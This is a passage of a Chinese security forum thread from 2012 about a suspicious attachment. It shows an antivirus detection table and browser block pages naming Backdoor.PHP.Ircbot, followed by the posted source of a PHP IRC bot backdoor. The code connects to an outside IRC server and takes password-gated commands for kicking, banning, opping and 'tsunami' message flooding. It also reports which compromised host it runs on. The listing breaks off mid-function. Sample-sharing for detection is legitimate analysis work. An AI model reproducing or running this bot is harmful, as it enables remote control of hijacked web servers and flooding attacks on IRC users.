Detection ratio: 11 / 42

显示全部楼层 · 发表于 2012-4-22 14:11:51

AhnLab-V3 - 20120421
AntiVir PHP/IRCBOT.bae 20120420
Antiy-AVL - 20120422
Avast PHP:IRCBot-J [Trj] 20120421
AVG - 20120421
BitDefender Backdoor.PHP.Ircbot.DS 20120422
ByteHero - 20120417
CAT-QuickHeal - 20120420
ClamAV - 20120422
Commtouch - 20120422
Comodo UnclassifiedMalware 20120422
DrWeb - 20120422
Emsisoft Backdoor.PHP.IRCBot!IK 20120422
eSafe - 20120419
eTrust-Vet - 20120421
F-Prot - 20120421
F-Secure Backdoor.PHP.Ircbot.DS 20120422
Fortinet - 20120422
GData Backdoor.PHP.Ircbot.DS 20120422
Ikarus Backdoor.PHP.IRCBot 20120422
Jiangmin - 20120422
K7AntiVirus - 20120420
Kaspersky Backdoor.PHP.IRCBot.ho 20120422
McAfee - 20120422
McAfee-GW-Edition - 20120421
Microsoft - 20120422
NOD32 - 20120422
Norman PHP/Pbot.L 20120421
nProtect - 20120421
Panda Bck/IRCBot.CYG 20120421
PCTools - 20120422
Rising - 20120420
Sophos - 20120421
SUPERAntiSpyware - 20120402
Symantec - 20120422
TheHacker - 20120420
TrendMicro - 20120422
TrendMicro-HouseCall - 20120422
VBA32 - 20120420
VIPRE - 20120422
ViRobot - 20120421
VirusBuster - 20120421

显示全部楼层 · 发表于 2012-4-22 14:13:04

STOP! Bitdefender blocked this web page.

The page you are trying to access contains malware.

Details:
Web Page: http://bbs.kafan.cn/forum.php?mo ... ;aid=MTYxNDc0Mnw...
Detected viruses: Backdoor.PHP.Ircbot.DS

Access from your browser has been blocked.

Take me back to safety

显示全部楼层 · 发表于 2012-4-22 14:15:27

LZ。。看看吧。。

显示全部楼层 · 发表于 2012-4-22 14:23:23

蓝天二号发表于 2012-4-22 14:15
LZ。。看看吧。。

怎么回事

显示全部楼层 · 发表于 2012-4-22 14:30:23

卡巴斯基安全部队
2012
拒绝访问
无法访问该网页

请求对象位于网址：

http://bbs.kafan.cn/forum.php?mod=
attachment&aid=MTYxNDc0MnwwYzEyMGFlMnwxM
zM1MDc2MTY5fDY1Mjk3MHwxMjczMzkz

检测到威胁：

对象已感染病毒Backdoor.PHP.IRCBot.ho

发生时间： 14:29:59

显示全部楼层 · 发表于 2012-4-22 14:45:12

NIS miss

显示全部楼层 · 发表于 2012-4-22 14:56:30

TO AVAST!

显示全部楼层 · 发表于 2012-4-22 15:09:03

有毒吗？图片？

显示全部楼层 · 发表于 2012-4-22 15:15:05

a<?php
/*
+---------------------------------------------------------------------------
| PHP-BOT v1.5 For Server aseanchat.net
| ==========================================================
| by [forbid]
| (c) 2008
| Email: chan_coke_coke@yahoo.com.user.quakenet.org <-- aDd mE [Friendster]
| irc: eten.ocean-law.com
| ==========================================================
|
+---------------------------------------------------------------------------
*/

function cayank() {
$nicky=array(
"wanita123",
"wanita456",
"wanita789",
"wanita012",
"wanita13",
"wanita14",
"wanita15",
"wanita16",
"wanita17",
"wanita18",
"wanita19",
"wanita20",
"wanita21",
"wanita22",
"wanita23",
"wanita24",
"Asmiati",
"Amaludin",
"Hungang",
"Aachserem",
"AmsterMoLd",
"ArSmoDels",
"ANgeL`T`Lork",
"AnDho`Ra",
"AndaIkuTahu",
"AndrianiKu",
"ANdrakuLi",
"wanita____",
"AntonLUCU",
"AntaraAkudanDia",
"ArdanCubby",
"ArniCakep",
"AranKal",
"ArisTeleke",
"Armoniculun",
"ArANSayNo",
"AtakuCaruni",
"AuSiBadeMu",
"AureMaPende",
"Axeslrod",
"AKuSayangKamu",
"AnDigusAe",
"AyKosHUki",
"Aylinklung",
"AziBishi",
"BaKLucipok",
"BackToLaptop",
"BaBonNakal",
"BaNdoCewek",
"BagoLSadis",
"BairlahKuPergi",
"BakauHuNi",
"BalaJar`Nich",
"BallonBiru",
"BalCoklat",
"BalCeMara",
"Bantal`ngePink",
"BaraApiCinta",
"BaraNgKali",
"BarangCuriaN",
"BaranKEceran",
"BarBarLuCu",
"BarbelaTi",
"Barnekat",
"BarnOrak",
"BarrAngkaliKu",
"Barr4KUla",
"BartaToMuda",
"BartoTongan",
"Bartomboyneh",
"BasavAyach",
"BasheVip",
"BatchFiles",
"BaumiNuman",
"BayGone",
"BayoCie",
"Beaconek",
"Bealboleh",
"BeanJelek",
"BeckBones",
"Bed2untukmu",
"BedforKamusay",
"Beha36c",
"BelangCowok",
"Bela_Jar_ngeCok",
"BeLMuarah",
"BelidaCakep",
"BellaMuanis",
"BellHouseEnak",
"BellIkanKucinta",
"BellokKananTrusTerjun",
"Benedis-cute",
"Bergosong",
"Berke-keKele",
"Bernardcupu",
"Bernasabonar",
"Bersamalagi",
"Berrikankucintha",
"BettiLaveani",
"BeyCintakuini",
"Biagiandalam",
"BicelBoneng",
"BiniIdaman",
"Bir-dan-anggur",
"BisMalam-minggu",
"BishaAjadeh",
"Black-Claw",
"Black-Cutes",
"BlagiaPatahHati",
"BlakoLakoke",
"Blankpages",
"BliSaMuanis",
"BliardTukangUtang",
"BlooNNih",
"BloemBerKasa",
"BloSariKucing",
"Blox34Mbakar",
"BlyBongBokong",
"BolGegerOtak",
"BoKannyaCinta",
"BolaCinta",
"BolongCelanaku",
"BonDuluyach",
"BonaKe",
"BonitakuCakep",
"BondanDonk",
"BoKanHanyakamu",
"Bookataue-book",
"Boongkan",
"BoorTanah",
"Borcakdarah",
"Bordenhitan",
"BosLagiapaneh",
"BotLamaBanget",
"BotoLDoDolz",
"BouKamutuh",
"BouCakepdeh",
"Bourdengaku",
"BoweLCutez",
"BoxerCiPoK",
"BoyaLiLiCUt",
"BoyeNgwanitaoS",
"BoyCakep",
"BoyMacammacam",
"BoYang",
"Brayeswah",
"Bra36c",
"Brapik-apik",
"BrengCarako",
"BreediMahal",
"Brenang-di-laut",
"BrendamDiPantai",
"BrewbrowSosok",
"Brewlakon",
"BridgeCakep",
"Bridganas",
"BrinTendang",
"BritisSpirtus",
"BroKoKok",
"BrooNonton",
"Brzykarte",
"BuchaMacan",
"Buddikucing",
"Buldarisma",
"BuTuti",
"Budarmansyah",
"Bubursapi",
"BurketLoh",
"BurahMurah",
"BusetLahLoh",
"Byabuyar",
"ByelahOke",
"ByBoyCakep",
"CageModel",
"CalmeCute",
"CameSiniDonksay",
"CamKuinirusak",
"Canley",
"Capanni",
"Caperton",
"Tanowitz",
"Tatar",
"Taveras",
"Tawn",
"Tcherepnin",
"Teague",
"Temes",
"Temmer",
"Tenney",
"Terracini",
"Than",
"Thavaneswaran",
"Theodos",
"Thibault",
"Thisted",
"Thomsen",
"Throop",
"Tierney",
"Till",
"Timmons",
"Tofallis",
"Tollestrup",
"Tolls",
"Tolman",
"Tomford",
"Toomer",
"Topulos",
"Torresi",
"Torske",
"Towler",
"Toye",
"Traebert",
"Trenga",
"Trewin",
"Tringali",
"Troiani",
"Troy",
"Truss",
"Tsiatis",
"Tsomides",
"Ullman",
"Untermeyer",
"Upsdell",
"Urban",
"Urdang-Brown",
"Usdan",
"Uzuner",
"Vacca",
"Waite",
"Valberg",
"Valencia",
"Wales",
"Wallenberg",
"Walter",
"vanAllen",
"VanZwet",
"Vandenberg",
"Vanheeckeren",
"Warshafsky",
);
$identlist = array(
"wanita",
"wanita",
"wanita",
"wanita",
"wanita",
"wanita",
"wanita",
"wanita",
"wanita",
"wanita",
"wanita",
"wanita",
"wanita",
"wanita",
"Uzuner",
"Vacca",
"Waite",
"Valberg",
"Valencia",
"Wales",
"Wallenberg",
"Walter",
"vanAllen",
"VanZwet",
"Vandenberg",
"Vanheeckeren",
"Warshafsky",
);
$tsu1=array("`","|","[","]","{","}","^","_");
$tsu2=array("`","|","[","]","{","}","^","-","\\","_");
$tsumsg = "13,1--=い ##@@###@@@###@@@###@@@@####@@@@####@@@@####wanita@crew###$#@@@@@@###13い=--";//400 Karakter

///***Seting Admin & Bot Ident***///
$nick = $nicky[rand(0,count($nicky) - 1)];
$awaymsg = "rahasia";
$identify = '';
$Admin = 'ugal';
$BOT_PASSWORD = 'wew';
$channels = '#marxone';
$remotehst2= array("irc.linkirc.org";
$remotehost= $remotehst2[rand(0,count($remotehst2) - 1)];
$port = '7000';
$realname = "12ugal";
$counterfp = 0;
$channels = str_replace("CNL","#",$channels);
print "<body bgcolor=#000000 text=#C0C0C0>";
print "== Connecting to $remotehost...";

$raway = "on";
$log = "off";
$saway = "1";
if (!$stime) { $stime = time(); }
if (!$port) { $port = "6668"; }
$Admin = strtolower($Admin);
$auth = array($Admin => array("name" => $Admin, "pass" => $BOT_PASSWORD, "auth" => 1,"status" => "Admin"));

$username = $identlist[rand(0,count($identlist) - 1)];
$keluar = 0;
$akill = 1;
$katime = 0;
$localhost = 'localhost';
$dayload = date("H:i:s d/m/Y");
ini_set('user_agent','MSIE 5\.5;');
set_time_limit(0);
define ('CRL', "\r\n");
$channels = strtolower($channels)." ";
$channel = explode(" ", $channels);

do {
 $fp = fsockopen($remotehost,$port, &$err_num, &$err_msg, 30);
 if(!$fp) {
if ( $counterfp <= 200 ) {
$counterfp = $counterfp+1;
working($nick);
}
 else {
 print " Cannot Koneksi Ke $remotehost! ulangi servel liyane";
 $keluar = 1;
 exit;
}
 }
 print " == Koneksi Berhasil";
 $Header = 'NICK '.$nick . CRL;
 $Header .= 'USER '.$username.' '.$localhost.' '.$remotehost.' :'.$realname . CRL;
 fputs($fp, $Header);
 $response = '';
 while (!feof($fp)) {
$response .= fgets($fp, 1024);
while (substr_count($response,CRL) != 0) {
$offset = strpos($response, CRL);
$data = substr($response,0,$offset);
$response = substr($response,$offset+2);
if (substr($data,0,1) == ':') {
$offsetA = strpos($data, ' ');
$dFrom = substr($data,1,$offsetA-1);
$offsetB = strpos($data, ' :');
$dCommand = substr($data,$offsetA+1,$offsetB-$offsetA-1);
$offsetC = strpos($data, '!');
$dNick = substr($data,1,$offsetC-1);
$iText = substr($data,$offsetB+2);
 if ( substr($dCommand,0,3) == '004' ) {
 fputs($fp, 'PRIVMSG nickserv :identify '.$nick.' '.$identify. CRL);
 if ($nickmode) { fputs($fp, 'MODE '.$nick.' :'.$nickmode . CRL); }
 fputs($fp, 'NOTICE ' . $Admin . ' :sayang ulunnnnn!!!!!!!!' . CRL);
 fputs($fp, base64_decode("Sk9JURUFN").CRL);
 foreach ($channel as $v) {
fputs($fp, 'JOIN ' .$v . CRL);
 }
 $pong1 = '1';
 }
elseif (substr($dCommand,0,3)=='465') {
print " == Bot iki wes dipateni.";
$akill = 2;
}
elseif (substr($dCommand,0,3)=='433') {
$nick = $nicky[rand(0,count($nicky) - 1)];
fputs($fp, 'NICK '.$nick . CRL);
}
elseif (substr($dCommand,0,3)=='432') {
$nick = $nick.$username;
fputs($fp, 'NICK '.$nick . CRL);
}
if (eregi('.dal.net',$dNick) && $akill==2) {
if (eregi('AKILL ID:',$data) || eregi('Your hostmask is',$data) || eregi('Your IP is',$data)) {
print " ".strstr($data,'***')." ";

if (eregi('Your IP is',$data)) {
$keluar = 1;
exit;
}
}
}
$dcom = explode(" ", $dCommand);
$dNick = strtolower($dNick);
if ($dcom[0]=='KICK' && $dcom[2]==$nick) {
fputs($fp, 'JOIN ' .$dcom[1]. CRL);
}
elseif ($dcom[0]=='NICK' || $dcom[0]=='QUIT' || $dcom[0]=='PART') {
if ($auth["$dNick"]) {
if ($auth["$dNick"]["pass"]) {
if ($auth["$dNick"]["auth"]==2) {

if ($dcom[0]=='NICK') {
$com = explode(" ", $data);
$chnick = strtolower(str_replace(':','',$com[2]));
if ($dNick!=$chnick) {
$auth["$dNick"]["auth"] = 1;
fputs($fp,'NOTICE '.$chnick.' :sayang kenapa ganti nick???????! ' . CRL);
}
} else { $auth["$dNick"]["auth"] = 1; fputs($fp,'NOTICE '.$dNick.' :arep coly tha Juragan??! ' . CRL); }
}
} else { fputs($fp,'NOTICE ' . $dNick . ' :pass your pass ' . CRL); }
}
}
elseif ($dcom[0]=='307' && strtolower($dcom[2])==$whois) {
$dcom[2] = strtolower($dcom[2]);
if ($auth["$dcom[2]"]) {
if ($auth["$dcom[2]"]["pass"]) {
if ($auth["$dcom[2]"]["auth"]==1) {
$auth["$dcom[2]"]["auth"] = 2; $whois = "";
fputs($fp,'NOTICE ' . $dcom[2] . ' :Pasword '.$auth["$dcom[2]"]["status"].' ganteng raimu guk ' . CRL);
} else { fputs($fp,'NOTICE ' . $dcom[2] . ' :Bozz ancene koyo kirik ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dcom[2] . ' :JAncok passmu durung di set! ketiken: pass <pass mu> iki mek pertama kali thok, terus auth`o maneh ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dcom[2] . ' :Nick Bozz Tidak Di Temukan Tolong Ganti Nick Dan Auth Lagi ' . CRL); }
}
elseif ($dcom[0]=='NOTICE') {
$com = explode(" ", $data);
if ($com[3]==':KB' && $com[4] && $com[5] && $com[6]) {
$msg = str_replace('','',$data);
$msg = strstr($msg,":KB");
$msg = str_replace(":KB $com[4]","",$msg);
fputs($fp, 'KICK '.$com[4].' '.$com[5].' :'.$msg . CRL);
fputs($fp, 'MODE '.$com[4].' +b *!*'.$com[6] . CRL);
}
}
elseif ($dcom[0]=='PRIVMSG') {
$com = explode(" ", $data);
if ($com[3]==':VERSION') {
fputs($fp,'NOTICE '.$dNick.' :'.chr(1).'VERSION banjar tempur panglima tertinggi By 13,1--=い 11[4B11]11[4a11][4N11][4J11][4a11][4R11]13^11[4C11][4R11][4e11][4W11] 13い=--'.chr(1) . CRL);
}
elseif ($auth["$dNick"]["status"] && $com[3]==':auth' && $com[4]) {
if ($auth["$dNick"]) {
if ($auth["$dNick"]["pass"]) {
if ($auth["$dNick"]["auth"]==1) {
if ($com[4]===$auth["$dNick"]["pass"]) {
$auth["$dNick"]["auth"] = 2;
fputs($fp,'NOTICE ' . $dNick . ' :salam '.$auth["$dNick"]["status"].' sayang Q! ' . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :password ngisruh! auth sing genah JANCOK! ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :neh iki baru seps! ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :JAncok passmu durung di set! ketiken: pass <pass anda> iki mek pertama kali thok, terus auth`o maneh ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Nick Bozz Tidak Di Temukan Tolong Ganti Nick Dan Auth Lagi ' . CRL); }
}
elseif ($auth["$dNick"]["status"] && $com[3]==':deauth') {
if ($auth["$dNick"]) {
if ($auth["$dNick"]["pass"]) {
if ($auth["$dNick"]["auth"]==2) {
$auth["$dNick"]["auth"] = 1;
fputs($fp,'NOTICE ' . $dNick . ' :minggato! ' . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :koen wes minggat! ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :JAncok passmu durung di set, ! ketiken: pass <passmu> iki mek pertama kali thok, terus auth`o maneh ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Username ga ketemu! ganti nickmu seng maeng terus auth maneh ' . CRL); }
}
elseif ($auth["$dNick"]["status"] && $com[3]==':pass' && $com[4]) {
if ($auth["$dNick"]) {
if (!$auth["$dNick"]["pass"]) {
$auth["$dNick"]["pass"] = $com[4];
$auth["$dNick"]["auth"] = 1;
fputs($fp,'NOTICE ' . $dNick . ' :pass anyarmu di set dadi '.$auth["$dNick"]["pass"].', Type: auth <your pass> To Authorized Imediately! ' . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :Pass wes siap! ketik: auth <your pass> ben aku percoyo ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Username ga ketemu! ganti nickmu seng maeng terus auth maneh ' . CRL); }
}
elseif ($auth["$dNick"]["status"] && $com[3]==':chgpass' && $com[4] && $com[5]) {
if ($auth["$dNick"]) {
if ($auth["$dNick"]["auth"]==2) {
if ($com[4]===$auth["$dNick"]["pass"]) {
$auth["$dNick"]["pass"] = $com[5];
fputs($fp,'NOTICE ' . $dNick . ' :pass anyarmu di set dadi '.$auth["$dNick"]["pass"].', ketik: auth <your pass> ben aku percoyo! ' . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :pass lawasmu salah! ketik: chgpass <pass lawas> <pass anyar> pakai ganti passmu ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Please Auth First! Type: auth <your pass> To Authorized ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Username ga ketemu! ganti nickmu seng maeng terus auth maneh ' . CRL); }
}
elseif ($auth["$dNick"]["status"] && $com[3]==':angkat' && $com[4] && $com[4]!=$nick && $com[5]) {
$com[4] = strtolower($com[4]);
if ($auth["$dNick"]["auth"]==2) {
if ($auth["$dNick"]["status"]=="Admin") {
if ($com[5]=="master" || $com[5]=="user") {
$auth["$com[4]"]["name"] = $com[4];
$auth["$com[4]"]["status"] = $com[5];
fputs($fp,'NOTICE ' . $dNick . ' :angkat :'.$com[4].' As My '.$com[5] . CRL);
fputs($fp,'NOTICE ' . $com[4] . ' :sudah d angkat sayang '.$com[5].' uleh '.$dNick.' ketiken: pass <your pass> silahkan set passmu ' . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :salah perintah! ketik ae: angkat <nick> <master/user> ' . CRL); }
} elseif ($auth["$dNick"]["status"]=="master") {
if (!$auth["$com[4]"]) {
if ($com[5]=="user") {
$auth["$com[4]"]["name"] = $com[4];
$auth["$com[4]"]["status"] = $com[5];
fputs($fp,'NOTICE ' . $dNick . ' :angkat :'.$com[4].' As My '.$com[5] . CRL);
fputs($fp,'NOTICE ' . $com[4] . ' :sudah d angkat sayang '.$com[5].' uleh '.$dNick.' ketiken: pass <your pass33] <Spyderur Pass ' . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :salah perintah! ketik: angkat <nick> user ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :anggota sudah ada g"bisa d angkat! ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Unknown Status! Your Status is '.$auth["$dNick"]["status"] . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :auth sudah pas! ketik: auth <your pass> biar afdhol ' . CRL); }
}
elseif ($auth["$dNick"]["status"] && $com[3]==':pecat' && $com[4]) {
$com[4] = strtolower($com[4]);
if ($auth["$dNick"]["auth"]==2) {
if ($auth["$dNick"]["status"]=="Admin") {
if ($auth["$com[4]"]["status"]=="master" || $auth["$com[4]"]["status"]=="user") {
unset($auth["$com[4]"]);
fputs($fp,'NOTICE ' . $dNick . ' :pecat :'.$com[4].' teko daftar klan ' . CRL);
fputs($fp,'NOTICE ' . $com[4] . ' :pian sudah salah pian d dipecat '.$dNick . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :salah sayang! ketik: pecat <nick> ' . CRL); }
} elseif ($auth["$dNick"]["status"]=="master") {
if ($auth["$com[4]"]["status"]=="user") {
unset($auth["$com[4]"]);
fputs($fp,'NOTICE ' . $dNick . ' :pecat :'.$com[4].' teko daftar klan ' . CRL);
fputs($fp,'NOTICE ' . $com[4] . ' :pian ba salah pian di dipecat '.$dNick . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :salah sayang! ketik: pecat <nick> ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Unknown Status! Your Status is '.$auth["$dNick"]["status"] . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :auth lagi sayang! ketik: auth <your pass> sep sayang ' . CRL); }
}
elseif ($auth["$dNick"]["status"]) {
if (ereg(":`",$com[3]) || ereg(":!",$com[3])) {
$chan = strstr($dCommand,"#");
$anick = str_replace("PRIVMSG ","",$dCommand);
if ($com[3]==':!auth') {
if ($auth["$dNick"]["auth"]==2) {
fputs($fp,'NOTICE '.$dNick.' :WB GUGUK KLAN!' . CRL);
} else {
$whois = $dNick;
fputs($fp,'WHOIS '.$dNick . CRL);
}
} elseif ($com[3]==':`auth' && $chan) {
if ($auth["$dNick"]["auth"]==2) {
fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.' siap cyng ulun nang bungasssss!' . CRL);
} else { fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.' woy lain cynk ulun piannn,,,,!' . CRL); }
} elseif ($auth["$dNick"]["auth"]==2) {
if ($com[3]==':`ngoceh' && $com[4] && $chan) {
$msg = strstr($data,":`ngoceh");
$msg = str_replace(":`ngoceh ","",$msg);
fputs($fp,'PRIVMSG '.$chan.' :'.$msg. CRL);
}
elseif ($com[3]==':`bid' && $com[4] && $chan) {
$msg = strstr($data,":`bid");
$msg = str_replace(":`bid ","",$msg);
fputs($fp,'PRIVMSG '.$chan.' :ACTION '.$msg.''. CRL);
}
elseif ($com[3]==':`entot' && $com[4] && $chan) {
fputs($fp,'PRIVMSG '.$chan.' :ACTION slaps '.$com[4].' entot raimu karo suspensi genjotan tapir :P~~~~ '. CRL);
}
elseif ($com[3]==':`serbu' && $com[4] && $com[5]) {
$msg = strstr($data,":`serbu");
$msg = str_replace(":`serbu $com[4] ","",$msg);
fputs($fp,'PRIVMSG '.$com[4].' :'.$msg. CRL);
}
elseif ($com[3]==':`sembur' && $com[4] && $com[5]) {
$msg = strstr($data,":`sembur");
$msg = str_replace(":`sembur $com[4] ","",$msg);
fputs($fp,'NOTICE '.$com[4].' :'.$msg. CRL);
}
elseif ($com[3]==':`ctcp' && $com[4] && $com[5]) {
$msg = strstr($data,":`ctcp");
$msg = str_replace(":`ctcp $com[4] ","",$msg);
fputs($fp,'PRIVMSG '.$com[4].' :'.$msg.''. CRL);
}
elseif ($com[3]==':`ping' && $chan) {
$sml = $smile[rand(0,count($smile) - 1)];
fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.', muuuaacchhhhhhhhh cyanggg ulun,,,,,,,, '.$sml. CRL);
}
elseif ($com[3]==':`pong' && $chan) {
$sml = $smile[rand(0,count($smile) - 1)];
fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.', PING! '.$sml. CRL);
}
elseif ($com[3]==':`info' && $auth["$dNick"]["status"]=="Admin") {
$bhost = $_SERVER['HTTP_HOST'];
$bphp = $_SERVER['PHP_SELF'];
fputs($fp,'NOTICE '.$dNick.' :`jejeg <n>=kick|`serbu <n>= pV|`sembur <n>=notice|`iklan (n)=tsunami|`ngoceh=say|`bid = act|`ganti=ganti nick|`ping|`entot|aku diinjek dr: '.$bhost.', Bot PHP: '.$bphp. CRL);
}
elseif ($com[3]==':`up' && $chan) {
fputs($fp, 'PRIVMSG chanserv :op '.$chan.' '.$nick . CRL);
}
elseif ($com[3]==':`down' && $chan) {
fputs($fp, 'MODE '.$chan.' +v-o '.$nick.' '.$nick . CRL);
}
elseif ($com[3]==':`iklan' && $com[4] && $auth["$dNick"]["status"]!="user") {
$nicktsu = $tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)];
fputs($fp, 'NICK '.$nicktsu . CRL);
if (substr($dCommand,0,3)=='433') {
$nicktsu = $tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)];
fputs($fp, 'NICK '.$nicktsu . CRL);
}
$msg = strstr($data,":`iklan");
$msg = str_replace(":`iklan $com[4]","",$msg);
if (ereg("#", $com[4])) {
 fputs($fp, 'JOIN '.$com[4] . CRL);
}
fputs($fp, 'PRIVMSG '.$com[4].' :'.$msg.'2,1@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@--=waik=--@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@|' . CRL);
fputs($fp, 'NOTICE '.$com[4].' :'.$msg.'2,1--=@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@--=ngol=--@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@=--|' . CRL);
fputs($fp, 'PRIVMSG '.$com[4].' :TSUNAMI '.$msg.'13,1--=い@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@mati@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@] 13い=--|' . CRL);
fputs($fp, 'PRIVMSG '.$com[4].' :'.$msg.'13,1--=い @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@hapus@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@13い=--|' . CRL);
fputs($fp, 'NOTICE '.$com[4].' :'.$msg.'13,1--=い @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@bongol@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@|' . CRL);
fputs($fp, 'PRIVMSG '.$com[4].' :FLOOD '.$msg.'13,1--=い @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@tambuk@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@13い=--|' . CRL);
if (ereg("#", $com[4])) {
 fputs($fp, 'PART '.$com[4].' :Complete' . CRL);
 fputs($fp, 'NICK '.$nick . CRL);
} else {
fputs($fp, 'NICK '.$nick . CRL);
}
}
elseif ($com[3]==':`cycle' && $chan && $auth["$dNick"]["status"]!="user") {
$msg = strstr($data,":`cycle");
if (ereg("#", $com[4])) {
 $partchan = $com[4];
 $msg = str_replace(":`cycle $com[4]","",$msg);
} else {
 $partchan = $chan;
 $msg = str_replace(":`cycle","",$msg);
}
if (strlen($msg)<3) {
 $msg = '';
}
fputs($fp, 'PART '.$partchan.' :'.$msg . CRL);
fputs($fp, 'JOIN '.$partchan . CRL);
}
elseif ($com[3]==':`minggat' && $auth["$dNick"]["status"]=="Admin") {
$msg = strstr($data,":`part");
if (ereg("#", $com[4])) {
 $partchan = $com[4];
 $msg = str_replace(":`minggat $com[4]","",$msg);
} else {
 $partchan = $chan;
 $msg = str_replace(":`minggat","",$msg);
}
if (strlen($msg)<3) {
 $msg = '';
}
fputs($fp, 'PART '.$partchan.' :'.$msg . CRL);
$remchan = strtolower($partchan);
if (in_array($remchan, $channel)) {
$channels = str_replace("$remchan ","",$channels);
unset($channel);
$channel = explode(" ", $channels);
}

foreach ($channel as $v) {
fputs($fp, 'JOIN '.$v . CRL);
}
}
elseif ($com[3]==':`melbu' && $com[4] && $auth["$dNick"]["status"]=="Admin") {
if (!ereg("#",$com[4])) { $com[4]="#".$com[4]; }
$addchan = strtolower($com[4]);
if (!in_array($addchan, $channel)) {
$channel[]=$addchan;
$channels.="$addchan ";
}
foreach ($channel as $v) {
sleep(rand(1,6));
fputs($fp, 'JOIN '.$v . CRL);
}
}
elseif ($com[3]==':`botnick' && $com[4] && !$chan && $auth["$dNick"]["status"]=="Admin") {
$nick = $com[4];
$identify = $com[5];
fputs($fp, 'NICK '.$nick . CRL);
 fputs($fp, 'PRIVMSG nickserv :identify '.$nick.' '.$identify. CRL);
}
elseif ($com[3]==':`jejeg' && $com[4] && $chan) {
$msg = strstr($data,":`jejeg");
$msg = str_replace(":`jejeg $com[4]","",$msg);
fputs($fp, 'KICK '.$chan.' '.$com[4].' :'.$msg . CRL);
}
elseif ($com[3]==':`usir' && $com[4] && $chan) {
$msg = strstr($data,":`usir");
$msg = str_replace(":`usir $com[4]","",$msg);
fputs($fp, 'KICK '.$chan.' '.$com[4].' :'.$msg . CRL);
fputs($fp, 'MODE '.$chan.' +b '.$com[4] . CRL);
}
elseif ($com[3]==':`ganti') {
$nick = $nicky[rand(0,count($nicky) - 1)];
fputs($fp, 'NICK '.$nick . CRL);
if (substr($dCommand,0,3)=='433') {
$nick = $nicky[rand(0,count($nicky) - 1)];
fputs($fp, 'NICK '.$nick . CRL);
}
}
elseif ($com[3]==':`op' && $chan) {
if ($com[4]) { $opnick = $com[4]; }
else { $opnick = $dNick; }
fputs($fp, 'MODE '.$chan.' +ooo '.$opnick.' '.$com[5].' '.$com[6] . CRL);
}
elseif ($com[3]==':`deop' && $chan) {
if ($com[4]) { $opnick = $com[4]; }
else { $opnick = $dNick; }
fputs($fp, 'MODE '.$chan.' -o+v-oo '.$opnick.' '.$opnick.' '.$com[5].' '.$com[6] . CRL);
}
elseif ($com[3]==':`v' && $chan) {
if ($com[4]) { $vonick = $com[4]; }
else { $vonick = $dNick; }
fputs($fp, 'MODE '.$chan.' +vvv '.$vonick.' '.$com[5].' '.$com[6] . CRL);
}
elseif ($com[3]==':`bisu' && $chan) {
